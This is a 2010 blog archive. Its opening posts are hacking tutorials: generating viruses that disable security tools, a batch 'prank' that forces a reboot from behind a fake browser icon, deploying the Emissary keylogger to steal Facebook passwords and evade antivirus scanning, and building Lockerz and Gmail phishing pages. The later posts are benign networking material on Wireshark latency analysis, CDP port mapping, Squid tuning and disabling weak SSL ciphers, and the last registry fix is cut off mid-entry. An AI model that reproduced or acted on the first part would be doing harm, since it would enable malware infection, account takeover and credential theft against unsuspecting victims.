Wednesday, August 18, 2010

How to Create a Computer Virus

Here is the list of software that allows you to make a virus:

1. In Shadow Batch Virus Generator

1. First of all download the virus maker from here

2. Run "In Shadow Batch Virus Generator.exe" application to see something like this:


3. You can use various options to make virus to suit your needs. You can:
  • Infect files of various extensions
  • Insert virus in startup menu, Kill various processes.
  • Disable all security services like Windows Defender, Antivirus, Firewall.
  • Rename file extensions, spread virus via file sharing.
  • Create new admin account, change user account password.
  • Block various websites, download trojan files to victim computer, shutdown victim computer and much more.

4. After selecting various options, move on to "Creating Options" tab and hit on "Save as Bat". Assign name to the virus and hit on Save.

5. Now, you have your virus ready to hack your victim. This virus maker is undetectable by most antivirus programs.

I am not responsible for any action performed by you. Also, do not try this virus on your own computer. This virus software is one of the most efficient virus software used today.


2. JPS Virus Maker


This is also a great virus maker with many features in it. Check all the features of JPS Virus maker here.


3. TeraBIT Virus Maker


A powerful virus maker for you. Look for updates here

Download JPS Virus Maker and TeraBit Virus Maker.

These two virus makers are detected as viruses by most anti-virus software, but they won't harm your PC in any way. Before you run these virus makers, disable your anti-virus temporarily.

Facebook Virus Prank - Making fun to your friend

In this post I'll show you an easy step-by-step tutorial about how to make a Facebook virus using simple commands in Notepad. This will make the victims think that they have a virus when they click on an icon such as Internet Explorer or Mozilla Firefox...
This "virus" is totally harmless and won't do any damage to your victim's computer.
When a victim clicks on the icon he will get a warning message like "WARNING VIRUS DETECTED!!!!! AFTER 5 MINUTES YOUR FACEBOOK ACCOUNT WILL BE DELETED !!!!TO REMOVE THE VIRUS CLICK OK OR CLOSE THIS BOX!". You can change the text to whatever you want. If you have some other interesting ideas, let me know. This virus doesn't do anything to your friend's PC, but to see his scared face, that's something :)...

Now let's start with the tutorial:

1) Open notepad

2) Type the following text in :

@echo off
msg * WARNING VIRUS DETECTED!!!!! AFTER 5 MINUTES YOUR FACEBOOK ACCOUNT WILL BE DELETED !!!!TO REMOVE THE VIRUS CLICK OK OR CLOSE THIS BOX!

PAUSE
shutdown -r -t 300 -c " SORRY!!! YOUR FACEBOOK ACCOUNT ARE NOW BEING DELETED !!! PLEASE WAIT ..........."



3) Save as Internet Explorer .bat
(or whatever you want, but be sure that the last letters are .bat)



4) Right click on Internet Explorer .bat and click Create Shortcut




5) Right click on the shortcut and click Properties.



6) Click Change Icon



7) Choose Internet Explorer icon (or Mozilla Firefox, or any other icon similar to it), click OK , then click Apply



8) Delete the real shortcut and replace it with the fake one. When the victim clicks on it, he will get a warning message that looks like this:




Hope you'll freak out friend(s).

If this prank was successful and there was some interesting reactions of your friends, feel free to share it with us.

How to Hack Facebook Password using Facebook Hacking Software

Hacking Facebook Account Password: Facebook Keylogging for Hacking Facebook

Every day I get emails wherein my readers ask me how to hack a Facebook account. You as the reader are most likely reading this because you want to hack into someone’s Facebook account. So in this post I have decided to uncover the real and working way to hack any Facebook account. Actually there are many ways to hack someone's Facebook password, like phishing, keylogging or using hacking software built to hack Facebook passwords. In this post I'm going to show you how to hack someone's Facebook account password using a keylogger - Emissary Keylogger.

How to Hack Facebook Password using Keylogger?


1. First of all Download Emissary Keylogger. It takes screenshots of the victim's computer and sends it to your gmail along with the logs.

2. Make sure that you have Microsoft .Net Framework installed in your Windows. You can download it from www.microsoft.com/net/. Else it won't work.

3. Extract the files using WinRar or any other zip/unzip program.

4. Open "Emissary.exe" to see something like this:



5. Now, fill in your Gmail username and password in the respective fields (you can create a Gmail account that you're going to use only for keylogging). Enter the email address where you want to receive Facebook passwords. Choose a name for the server.exe file. You can set the timer as you wish. This timer controls the time interval between two log emails.

6. In the "Options" section you can see what this evil little buddy can do ;)
  • Block AV Sites: Blocks VirusScanning Websites on victim's computer
  • Add to Startup: Adds to Startup via Registry
  • Antis: Anubis, BitDefender, Kaspersky, Keyscrambler, Malwarebytes, NOD32, Norman, Ollydbg, Outpost, Wireshark
  • Disable TaskManager: Disable TaskManager on victim's PC
  • Disable Regedit: Disables Regedit on victim's PC

7. Check "Trojan Downloader" to download and execute a trojan on the victim's PC. You can also create a fake error message and scare your victim, like:


8. After you're done, hit on "Build" and you will get server keylogger file created in current directory.

9. Now, to hack facebook password, you have to send this server file to victim and make him install it on his computer. You can use Binder, Crypter or Fake Hacking Software to bind this server file with say any .mp3 file so that whenever victim runs mp3 file, server is automatically installed on his computer without his knowledge.

10. Now because this is a server.exe file you can't send it via email. Almost all email domains have security policy which does not allow sending .exe files. So to do this you need to compress the file with WinRar or upload it to Free File Storage Domains, like Mediafire, Speedyshare, Ziddu.com, etc.

11. Once the victim runs our sent keylogger file on his computer, it searches for all stored passwords and sends you an email containing all user IDs and passwords, like:


Now you have all victim email passwords in your inbox and you can now hack victim facebook accounts easily. I have personally tested this free keylogger and found it working 100%. Enjoy Hacking.


Very Important: Do not scan these tools on VirusTotal. Use http://scanner.novirusthanks.org and also check the "Do not distribute the sample" option.

How to Create Your Own Phisher to Hack Any Website Account Password

Previously I've posted how to hack websites using phishing, like eBay, Gmail and Facebook. Here I want to show you how to make a phishing page using a phishing creator - Super Phisher - and get account information for various websites from many people. This is the easiest and also a very effective way to make a phisher and hack any website account password.

Here are some features of Super Phisher:
  • Fastest phisher maker tool ever
  • Makes phisher for almost any site
  • Useful for users who don't know HTML or PHP coding
  • No manual work except entering the URL of the website for which you want to make a phisher
  • Fully automated tool
  • Small in size.
  • Instant access to phishers you created.

For example i will show you how to make a phishing site of Lockerz.com.

Here is a step by step guide to hack any website account password using phishing creator tool:

1. First of all download Super Phisher here.

2. In "Super Phisher" folder, open "Super Phisher.exe" file to get something like:


3. Now, in "URL of Login Page", enter http://www.lockerz.com. This is the site you want to hack.

4. In "Name of Log File" write password.txt or whatever you like. This is the place where all typed id and password are stored. In "Name of PHP File" also type anything you like, e.g. lockerz.php or login.php...

5. In field of "Site redirect to", enter http://www.lockerz.com/myLocker, so that victim is redirected to original Locker site when he enters his email and password.

6. Click on "Build Phisher" and you will get Lockerz phisher created in "Output" folder in current directory.

7. Upload all of the phisher files to any free webhost site like:
8. Once you have uploaded the files in the directory, send this phisher link to your victim and make him login to his Lockerz account using your sent Phisher.

9. Once he logs in to his Lockerz account using Phisher, all his typed email and password is stored in "password.txt".


10. Now you can see password in this .txt file and hack Lockerz account password.


Super Phisher is just awesome software to hack Lockerz account password. This software not only is used to hack Lockerz account password, but also can hack orkut, gmail, yahoo, myspace and many other emails.

How To Hack Gmail Account Password




How to hack gmail account password:

1. First of all download Gmail Phisher

2. The downloaded file contains:
  • gmail.html
  • log.txt
  • mail.php
3. Upload all of the files to any free webhost site like:
4. Once you have uploaded the files in the directory, send this phisher link (gmail.html) to your victim and make him login to his Gmail account using your sent Phisher.

5. Once he logs in to his Gmail account using Phisher, all his typed Gmail id and password is stored in "log.txt".


6. Now, open log.txt to get hacked Gmail id and password as shown.


That's it, very simple. Now you have your victim's Gmail id and password hacked.


How it works ?


When a user types a username and password in the text box, the info is sent to "login.php", which acts as a password logger and redirects the page to "LoginFrame2.htm", which shows "There has been a temporary error Please Try Again". So when the person clicks on try again it redirects to the actual URL, so that the victim does not know that your site is a fake site and gets his gmail.com password hacked.

Tuesday, August 17, 2010

Identifying Slow Server Response at Packet Level (by Chris Greer)

Why is tracking down a server performance problem so difficult? First, it can be hard to dig through thousands of packets to find a solid example of a slow response. Once a slow response is isolated, identifying the root cause can also present a challenge. In this tip, we will show how to isolate a slow response from a server, filter on it, and determine if the root cause is the network or the server itself.

• Start at the client end

Often, when first analyzing a slow application, it is easiest to start at the client end. Although the problem may not be fully understood until a capture is taken at the server end, the trace file will be much simpler and easier to read when only one client experience is captured. Make sure that while capturing, the user is able to reproduce the performance problem.

• Look for client connecting to server

Look through the trace file to find where the client initiates a DNS query for the slow application server. It may be that they already have this server in their DNS cache, in which case the client may simply send a TCP SYN directly to the application server. If DNS is used, make sure that the DNS response time is low using the time column in your packet analyzer.

-Note: When measuring application response, be sure to use a delta timer that shows the amount of time between packets. This can be accessed in Wireshark from the View drop-down menu.


F1

If the DNS response time is quick (it should not be longer than 150ms or so), the client will next send a connection request to the application server. This will be a TCP SYN packet, the first in the TCP three-way handshake. Use a TCP Stream filter to isolate this connection (right click on any packet in the TCP connection, select TCP Stream Filter). The goal in isolating this connection is to compare the network roundtrip time to the server response time.

Once this connection is isolated, look at the delta time between the TCP SYN sent by the client and the TCP SYN-ACK sent back from the server. This can be used as a benchmark connection setup time. In the picture below, the response from the server is displayed in packet 7. It took 134msec to hear back from the server.


F2


• Measure application response time – compare to connection setup time

Next, after the TCP connection has been established, the client will request data from the server. In the web-based application above, the client performs an HTTP GET. Use the delta time column to see how long it takes the server to respond to this request. In our example above, the server responds after 125msec with a TCP ACK. This indicates that the server received the request, but has not yet responded with actual data. After waiting 4.85 SECONDS, the server finally sends a packet with application data. After this, packets are flying by at wire-speed. Comparing 4.85 seconds to the connection setup time, 134msec, we see that the server response time is very slow.


• Server, client or network delay?

From this information, it is simple to determine where to troubleshoot next. If the server response time is significantly higher than the connection setup time, and there are no TCP retransmissions, the problem is on the server end. In the case above, the server responded to the request with an ACK, showing it received the request and was busy processing it. The network is not to blame for this delay.
If any retransmissions are observed, the network is dropping packets somewhere. The server may not be to blame for slow performance, especially if it isn’t getting requests in the first place.


• If no delay is observed in this transaction ...

Move to the next request, keeping an eye on the amount of time it is taking for the server to respond to requests. Always use the connection setup time as a benchmark network roundtrip timer. This may take some time to do packet by packet, but since the capture was taken client-end, this is an excellent way to get familiar with the application behavior and look for patterns in client requests.

Once you get a good feel for the requests involved in this application, the analyzer can be moved to the server end – this way you can look for packets that are being sent during the slow requests. In the example above, we would be interested in what the server is busy doing during the 4.85 seconds of delay. Is a downstream server being called? Is a DNS request timing out?

Getting started in analyzing a slow application is sometimes the hardest step. By starting at the client, reproducing the problem, carefully watching TCP connection setup time, and comparing this with server response time, you can narrow down on which requests are slow and identify the root cause. Even if the problem cannot be determined at the client end, you will have an idea on what the next step in troubleshooting will be, whether to focus on the network or server.
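The procedure above (handshake time as the network benchmark, bare ACK versus first data packet as the server response, retransmissions as the sign of a network problem) can be scripted once the packets are exported from the analyzer. The block below is an added example, not Chris Greer's code: it runs the comparison over two constructed traces that mirror the article's numbers (134 msec handshake, 125 msec to the ACK, 4.85 seconds to data) and over a second trace where the request is retransmitted. The host addresses, the 5x "significantly higher" threshold and the Wireshark-style info strings are assumptions.

```python
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional


@dataclass
class Packet:
    t: float        # capture timestamp in seconds
    src: str
    dst: str
    proto: str      # "DNS", "TCP" or "HTTP"
    info: str       # analyzer-style summary, e.g. "SYN", "SYN-ACK", "ACK", "GET /x", "Retransmission"
    payload: int = 0  # application bytes carried by the packet


CLIENT, RESOLVER, SERVER = "10.0.0.5", "10.0.0.1", "192.0.2.10"   # constructed addresses

# Constructed trace (not a real capture) mirroring the article: the server ACKs the
# request quickly but takes 4.85 s to send any data, with no loss on the wire.
TRACE_SLOW_SERVER: List[Packet] = [
    Packet(0.000, CLIENT, RESOLVER, "DNS", "Standard query A app.example.test"),
    Packet(0.021, RESOLVER, CLIENT, "DNS", "Standard query response A 192.0.2.10"),
    Packet(0.050, CLIENT, SERVER, "TCP", "SYN"),
    Packet(0.184, SERVER, CLIENT, "TCP", "SYN-ACK"),
    Packet(0.185, CLIENT, SERVER, "TCP", "ACK"),
    Packet(0.186, CLIENT, SERVER, "HTTP", "GET /app/report", 312),
    Packet(0.311, SERVER, CLIENT, "TCP", "ACK"),
    Packet(5.036, SERVER, CLIENT, "HTTP", "200 OK", 1460),
    Packet(5.037, SERVER, CLIENT, "TCP", "data", 1460),
]

# Same request, but the first copy is lost and resent: the delay belongs to the network.
TRACE_LOSSY: List[Packet] = [
    Packet(0.050, CLIENT, SERVER, "TCP", "SYN"),
    Packet(0.184, SERVER, CLIENT, "TCP", "SYN-ACK"),
    Packet(0.185, CLIENT, SERVER, "TCP", "ACK"),
    Packet(0.186, CLIENT, SERVER, "HTTP", "GET /app/report", 312),
    Packet(3.190, CLIENT, SERVER, "HTTP", "[TCP Retransmission] GET /app/report", 312),
    Packet(3.330, SERVER, CLIENT, "HTTP", "200 OK", 1460),
]

SLOW_RATIO = 5.0  # assumption: "significantly higher" = more than 5x the handshake round trip


def first(trace: List[Packet], pred: Callable[[Packet], bool], after: float = -1.0) -> Optional[Packet]:
    """First packet later than `after` that satisfies pred, or None."""
    for p in trace:
        if p.t > after and pred(p):
            return p
    return None


def ms(a: Packet, b: Packet) -> float:
    """Delta time between two packets in milliseconds (the analyzer's delta column)."""
    return round((b.t - a.t) * 1000, 1)


def analyze(trace: List[Packet]) -> Dict[str, object]:
    """Compare connection setup time with server response time and name the likely culprit."""
    r: Dict[str, object] = {}
    q = first(trace, lambda p: p.proto == "DNS" and p.src == CLIENT)
    if q:
        a = first(trace, lambda p: p.proto == "DNS" and p.dst == CLIENT, q.t)
        r["dns_ms"] = ms(q, a) if a else None
    syn = first(trace, lambda p: p.src == CLIENT and p.info == "SYN")
    synack = first(trace, lambda p: p.src == SERVER and p.info == "SYN-ACK", syn.t) if syn else None
    if not syn or not synack:
        raise ValueError("no complete TCP handshake in trace")
    r["setup_ms"] = ms(syn, synack)                      # benchmark network round trip
    req = first(trace, lambda p: p.src == CLIENT and p.payload > 0, synack.t)
    ack = first(trace, lambda p: p.src == SERVER and p.info == "ACK", req.t)
    data = first(trace, lambda p: p.src == SERVER and p.payload > 0, req.t)
    r["ack_ms"] = ms(req, ack) if ack else None           # server received the request
    r["response_ms"] = ms(req, data) if data else None    # server produced the first data
    r["retransmissions"] = sum("Retransmission" in p.info for p in trace)
    if r["retransmissions"]:
        r["verdict"] = "network"       # packets are being dropped somewhere
    elif r["response_ms"] is not None and r["response_ms"] > SLOW_RATIO * r["setup_ms"]:
        r["verdict"] = "server"        # request arrived (ACK) but processing was slow
    else:
        r["verdict"] = "no significant delay"
    return r


if __name__ == "__main__":
    for name, trace in (("slow server", TRACE_SLOW_SERVER), ("lossy path", TRACE_LOSSY)):
        print(name, analyze(trace))
```

The two traces are deliberately the same exchange with one difference, so the verdict flips from "server" to "network" on the single retransmission, which is the decision rule the tip describes.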


Monday, August 16, 2010

Mapping Physical Jacks to Switch Ports


F1


Chris' Quick Tip: Mapping Physical Jacks to Switch Ports

How can we use Wireshark to save time in physical layer management - a 5 Minute Solution



In this quick tip we will show how to use the Cisco Discovery Protocol or the Link Layer Discovery Protocol to determine what switch, port, and VLAN we are connected to on the network. From time to time when we are troubleshooting a problem we need to know what port corresponds to the wall jack we are snapped into. In many cases, switch connectivity to the desktop is either poorly documented or out of date. Using these protocols, we can see where we are connected within a few seconds.

This tip will only work on networks where CDP or LLDP are enabled. Many switches come with this feature enabled, but in some environments these protocols are disabled.


  1. First, connect a laptop with Wireshark installed to the wall or office jack you wish to document.
  2. Fire up the analyzer and capture either 60 seconds of traffic, or until you see the CDP or LLDP packet roll by on the screen. By default, CDP is transmitted every 60 seconds. Type CDP in the display filter bar and apply.

F2

  3. In the summary view, we can quickly see what switch and port we are connected to. If this is not enough information, we can look further into the CDP details by expanding this field.

F3

Here we can see the switch, port, duplex, VLAN, switch IP, and platform of the device we are connected to. If an LLDP packet is caught (typically on non-Cisco switches) similar information will be displayed.

Using this packet we can quickly determine where we are plugged into the network, saving us time in updating documentation and troubleshooting end user connectivity problems.
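The fields Wireshark shows in the expanded CDP packet (device ID, port ID, native VLAN, address, platform, duplex) are plain type-length-value records after a 4-byte header. As an added example that is not part of Chris' tip, the Python below builds a CDP v2 payload for a fictitious switch (every name, address and VLAN in it is made up) and then parses it back, which is what you would do to turn a capture into jack-to-port documentation automatically. The checksum routine assumes an even-length payload; Cisco pads odd lengths differently, which this code does not model.

```python
import struct
from typing import Any, Dict, List

# CDP TLV type codes from the protocol; the frame built below is constructed, not captured.
TLV_DEVICE_ID, TLV_ADDRESSES, TLV_PORT_ID = 0x0001, 0x0002, 0x0003
TLV_PLATFORM, TLV_NATIVE_VLAN, TLV_DUPLEX = 0x0006, 0x000A, 0x000B
NLPID_IPV4 = b"\xcc"   # protocol id CDP uses for an IPv4 address


def inet_checksum(data: bytes) -> int:
    """Ones'-complement checksum over 16-bit words (even-length payload assumed)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def tlv(kind: int, value: bytes) -> bytes:
    """TLV length covers the 4-byte type/length header plus the value."""
    return struct.pack("!HH", kind, len(value) + 4) + value


def build_sample_cdp() -> bytes:
    """Construct a CDP v2 payload (the bytes after the LLC/SNAP header) for a fictitious switch."""
    addresses = (struct.pack("!I", 1)                                    # number of addresses
                 + struct.pack("!BB", 1, len(NLPID_IPV4)) + NLPID_IPV4   # protocol type 1 = NLPID
                 + struct.pack("!H", 4) + bytes([10, 1, 3, 2]))          # address length + IPv4
    body = (tlv(TLV_DEVICE_ID, b"sw-floor3-01")
            + tlv(TLV_ADDRESSES, addresses)
            + tlv(TLV_PORT_ID, b"GigabitEthernet1/0/2")
            + tlv(TLV_PLATFORM, b"cisco WS-C2960X-48TS-L")
            + tlv(TLV_NATIVE_VLAN, struct.pack("!H", 30))
            + tlv(TLV_DUPLEX, b"\x01"))                                  # 1 = full duplex
    header = struct.pack("!BBH", 2, 180, 0)                              # version 2, TTL 180 s, checksum 0
    return struct.pack("!BBH", 2, 180, inet_checksum(header + body)) + body


def parse_addresses(value: bytes) -> List[str]:
    """Decode the Addresses TLV; IPv4 becomes dotted quad, anything else is returned as hex."""
    (count,) = struct.unpack("!I", value[:4])
    off, out = 4, []
    for _ in range(count):
        _ptype, plen = value[off], value[off + 1]
        proto = value[off + 2:off + 2 + plen]
        off += 2 + plen
        (alen,) = struct.unpack("!H", value[off:off + 2])
        addr = value[off + 2:off + 2 + alen]
        off += 2 + alen
        out.append(".".join(str(b) for b in addr) if proto == NLPID_IPV4 and alen == 4 else addr.hex())
    return out


def parse_cdp(frame: bytes) -> Dict[str, Any]:
    """Walk the TLVs and return the fields the tip reads off the Wireshark detail pane."""
    version, ttl, csum = struct.unpack("!BBH", frame[:4])
    zeroed = frame[:2] + b"\x00\x00" + frame[4:]
    info: Dict[str, Any] = {"version": version, "ttl": ttl,
                            "checksum_ok": inet_checksum(zeroed) == csum}
    off = 4
    while off + 4 <= len(frame):
        kind, length = struct.unpack("!HH", frame[off:off + 4])
        if length < 4 or off + length > len(frame):
            raise ValueError("malformed CDP TLV at offset %d" % off)
        value = frame[off + 4:off + length]
        if kind == TLV_DEVICE_ID:
            info["device_id"] = value.decode("ascii", "replace")
        elif kind == TLV_PORT_ID:
            info["port_id"] = value.decode("ascii", "replace")
        elif kind == TLV_PLATFORM:
            info["platform"] = value.decode("ascii", "replace")
        elif kind == TLV_NATIVE_VLAN:
            info["native_vlan"] = struct.unpack("!H", value[:2])[0]
        elif kind == TLV_DUPLEX:
            info["duplex"] = "full" if value[:1] == b"\x01" else "half"
        elif kind == TLV_ADDRESSES:
            info["addresses"] = parse_addresses(value)
        off += length
    return info


if __name__ == "__main__":
    print(parse_cdp(build_sample_cdp()))
```

To use this on a real capture, export the CDP packet bytes from Wireshark and pass the payload that follows the SNAP header to parse_cdp; the device_id/port_id pair is the jack-to-port mapping the tip is after.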

Optimization

For the large systems of financial, securities and banking companies, optimization is carried out specifically on each "tier". For example, going from the outside in: at the network tier, if there is no specific QoS and packets flow in and out indiscriminately, there is no way to guarantee transport quality, which leads to compounding slowdowns. Next come applications/devices such as firewalls, reverse proxies...; if these are not properly tuned, performance drops because every hop reduces access speed. Reaching the web tier, if it is not optimized adequately, the number of connections available is insufficient or the time a session is allowed to stay open is unnecessarily long, so resources run short and things stall. In the inner application tier, inefficient and poorly optimized code creates poor performance and serious "resource eating". Even simple things like the database connection pool, if not "tuned" properly, will also cause seriously poor performance.

Looking across the tiers as a whole:
network BW --> router --> FW --> proxies --> web --> app --> database --> storage

Each tier may have one or more devices in parallel and has different requirements.

In general, the principles of optimization apply to every tier throughout a system's architecture. Each optimization is different (because each has a different nature and role), but they all share the same goals:
- Fast.
- Robust.
- Secure.

Thursday, August 12, 2010

10 Awesome Examples for Viewing Huge Log Files in Unix

http://www.thegeekstuff.com/2009/08/10-awesome-examples-for-viewing-huge-log-files-in-unix/

Sunday, August 8, 2010

Slow Squid cache

A slow Squid cache is usually caused by I/O on the disk cache. To speed it up, spread the disk cache across several directories located on different disks (to increase bandwidth). Instead of:
cache_dir ufs /path/to/cache 500000 16 256

split it up:
cache_dir ufs /path/to/cache1 100000 16 256
cache_dir ufs /path/to/cache2 100000 16 256
cache_dir ufs /path/to/cache3 100000 16 256
cache_dir ufs /path/to/cache4 100000 16 256

When mounting those partitions, use the noatime and nodiratime options. If this Squid system is locked down and nobody uses it directly (no direct access), also add noxattr. These will increase disk cache performance. If possible, use ReiserFS instead of ext3 for the disk cache.

Also adjust the directives:
maximum_object_size
minimum_object_size
maximum_object_size_in_memory

appropriately. Caching everything is not necessarily a good thing.

Set an appropriate value for max_open_disk_fds instead of leaving the default if you have disk I/O problems, because if it is set to 0 (unlimited) while ulimit is set lower, Squid will stall. At the OS level, set the file descriptor limit to at least 8192 and apply the same value to max_open_disk_fds.
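The mount-option and file-descriptor advice above is easy to get wrong silently (one cache_dir mounted with relatime, or max_open_disk_fds higher than the process limit). As an added example, not part of the original post, the Python below audits a squid.conf fragment against /proc/mounts-style text and a file-descriptor limit, reporting cache directories that lack noatime/nodiratime, cache directories that share one filesystem, and a max_open_disk_fds that is unset, 0 or above the limit. The sample mounts and configuration are constructed, and /etc/squid/squid.conf is an assumed path.

```python
from typing import Dict, List, Optional, Set, Tuple

# Constructed /proc/mounts excerpt and squid.conf fragment (not taken from a real host).
SAMPLE_MOUNTS = """/dev/sdb1 /cache1 ext3 rw,noatime,nodiratime 0 0
/dev/sdc1 /cache2 ext3 rw,noatime,nodiratime 0 0
/dev/sdd1 /cache3 ext3 rw,relatime 0 0
"""
SAMPLE_SQUID_CONF = """# disk cache split across several filesystems, as in the post
cache_dir ufs /cache1 100000 16 256
cache_dir ufs /cache2 100000 16 256
cache_dir ufs /cache3 100000 16 256
max_open_disk_fds 8192
maximum_object_size 4096 KB
"""

REQUIRED_OPTS = ("noatime", "nodiratime")
MIN_FDS = 8192  # the post's recommended OS file-descriptor limit


def parse_mounts(text: str) -> Dict[str, Set[str]]:
    """Map mount point -> mount options; /proc/mounts fields are device, mountpoint, fstype, options."""
    mounts: Dict[str, Set[str]] = {}
    for line in text.splitlines():
        fields = line.split()
        if len(fields) >= 4:
            mounts[fields[1]] = set(fields[3].split(","))
    return mounts


def mount_for(path: str, mounts: Dict[str, Set[str]]) -> Optional[str]:
    """Longest mount point that contains path, or None if nothing matches."""
    best = None
    for mp in mounts:
        if path == mp or path.startswith(mp.rstrip("/") + "/"):
            if best is None or len(mp) > len(best):
                best = mp
    return best


def parse_squid_conf(text: str) -> Tuple[List[str], Dict[str, List[str]]]:
    """Return the cache_dir paths and the remaining directives (name -> arguments)."""
    cache_dirs: List[str] = []
    directives: Dict[str, List[str]] = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        if parts[0] == "cache_dir" and len(parts) >= 3:
            cache_dirs.append(parts[2])
        else:
            directives[parts[0]] = parts[1:]
    return cache_dirs, directives


def audit(mounts_text: str, conf_text: str, fd_limit: int) -> List[str]:
    """Return findings; an empty list means every check from the post passes."""
    mounts = parse_mounts(mounts_text)
    cache_dirs, directives = parse_squid_conf(conf_text)
    findings: List[str] = []
    seen: Dict[str, str] = {}
    for d in cache_dirs:
        mp = mount_for(d, mounts)
        if mp is None:
            findings.append(f"{d}: not on any mounted filesystem")
            continue
        missing = [o for o in REQUIRED_OPTS if o not in mounts[mp]]
        if missing:
            findings.append(f"{d}: mount {mp} lacks {','.join(missing)}")
        if mp in seen:  # two cache_dirs on one filesystem share its I/O bandwidth
            findings.append(f"{d}: shares mount {mp} with {seen[mp]}")
        seen.setdefault(mp, d)
    fds = directives.get("max_open_disk_fds")
    if fds is None or int(fds[0]) == 0:
        findings.append("max_open_disk_fds is unset or 0 (unlimited); set it to the OS limit")
    elif int(fds[0]) > fd_limit:
        findings.append(f"max_open_disk_fds {fds[0]} exceeds the process fd limit {fd_limit}")
    if fd_limit < MIN_FDS:
        findings.append(f"fd limit {fd_limit} is below {MIN_FDS}")
    return findings


def audit_host(conf_path: str = "/etc/squid/squid.conf") -> List[str]:
    """Run the same checks on the live host (conf_path is an assumed location)."""
    import resource
    soft_limit = resource.getrlimit(resource.RLIMIT_NOFILE)[0]
    with open("/proc/mounts") as m, open(conf_path) as c:
        return audit(m.read(), c.read(), soft_limit)


if __name__ == "__main__":
    for finding in audit(SAMPLE_MOUNTS, SAMPLE_SQUID_CONF, 1024):
        print("-", finding)
```

Run against the sample with a 1024 descriptor limit it reports the relatime mount, the oversized max_open_disk_fds and the low limit; with 8192 only the mount option finding remains.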

Friday, August 6, 2010

Top 5 undiscovered vulnerabilities found on enterprise networks

A report by Lumeta highlights the five most prevalent undiscovered or unknown vulnerabilities commonly found on enterprise networks.


1. Incorrect or incomplete deployments of IPS/IDS. 88 percent of enterprise networks display network segments that are not properly monitored or protected by an IPS/IDS.

2. Failure to discover and probe all segments of a network with vulnerability management tools. 76 percent of organizations using vulnerability management tools were inadvertently doing so on only a subset of their network segments.

3. Overlooking non-traditional IP-enabled devices. The third most common overlooked vulnerability was that posed by non-traditional IP-enabled devices, such as smart phones, building controls, ATMs, POS devices, and medical equipment. When devices are network connected, but are not managed or monitored by the tools IT uses to maintain the network, they can provide an “unsupervised” ingress or egress on the network.

4. Using default credentials on network devices. Though other reports have indicated exploits in this area are becoming less frequent, 50 percent of enterprises still have default credentials on network infrastructure equipment prior to using network discovery.

5. Unauthorized wireless access points (WAPs). The final overlooked security loophole to make the report is the presence of unauthorized WAPs. Rogue WAPs, which have been responsible for some of the largest data breaches in history, were still discovered on nearly 30 percent of enterprises in 2009.

“One need only look at the very real costs incurred by companies that have suffered major data breaches or operational downtime to understand what’s at risk,” said Lumeta COO Michael Markulec. “We’ve begun publishing these most commonly discovered vulnerabilities because, once detected, they’re all easily remedied. The reason these security gaps can be exploited isn’t because we don’t have the tools to fix them, it’s because they are often undiscovered or unknown.”


Thursday, August 5, 2010

How to change SSL Windows ciphers Strength The remote service supports the use of weak SSL ciphers

If you deal with Credit Cards on the Internet, then it is very likely that you will have to conform to the Payment Card Industry Data Security Standards (PCI-DSS). You can get the standards specification, the self assessment questionnaire, or find instructions on exactly what you need to do to conform on the PCI-Security Standards Council website.

Depending on the nature of your business, and indeed how much money you see, you may need to perform network vulnerability assessments every quarter. These assessments are performed against the servers hosting your ‘payment application’, i.e. your web server.

You will find a complete list of all companies that are recognised by the PCI on their website here (PDF) and most will offer some kind of free limited network assessment (such as 5 free scans for up to 3 IPs per device)

So, you’ve run your network vulnerability assessment on your IIS6 server. Great. But now you received a “NOT COMPLIANT” report as a result of failing the following two tests:

  • “Deprecated SSL Protocol Usage”
  • “Weak Supported SSL Ciphers Suites”

Let’s look at each one in turn and how to solve them.

Deprecated SSL Protocol Usage - The remote service encrypts traffic using a protocol with known weaknesses

The report may also give you the following information to put the fear of your god into you - “The remote service accepts connections encrypted using SSL 2.0, which reportedly suffers from several cryptographic flaws and has been deprecated for several years. An attacker may be able to exploit these issues to conduct man-in-the-middle attacks or decrypt communications between the affected service and clients.”

You can confirm the report's findings by typing your hostname or IP into this handy utility - http://www.serversniff.net/sslcheck.php - which will generate a report such as the picture below

image

The report is showing you that both SSL2 and SSL3 are enabled, and all the ciphers currently exposed by the server.

OK - so we want to remove SSL2 from this list. Unfortunately the only fix I know for this is by modifying some keys in your registry. There is a Microsoft Support article (187498) here which describes the following registry modifications.

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\Multi-Protocol Unified Hello\Server]
"Enabled"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\PCT 1.0\Server]
"Enabled"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 2.0\Server]
"Enabled"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 3.0\Server]
"Enabled"=dword:ffffffff
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.0\Server]
"Enabled"=dword:ffffffff


What is happening here is that you are explicitly turning off PCT 1.0, SSL 2.0 and explicitly turning on SSL 3.0, TLS 1.0.

Running the report again on http://www.serversniff.net/sslcheck.php should present results something like below:

image

Right, now let's get rid of those weak ciphers.

Weak Supported SSL Ciphers Suites - The remote service supports the use of weak SSL ciphers

Again, another hard hitting description may be given - “The remote host supports the use of SSL ciphers that offer either weak encryption or no encryption at all”

OK. Here’s registry fix number 2.

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\DES 56/56]
"Enabled"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\NULL]
"Enabled"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\RC2 128/128]
"Enabled"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\RC2 40/128]
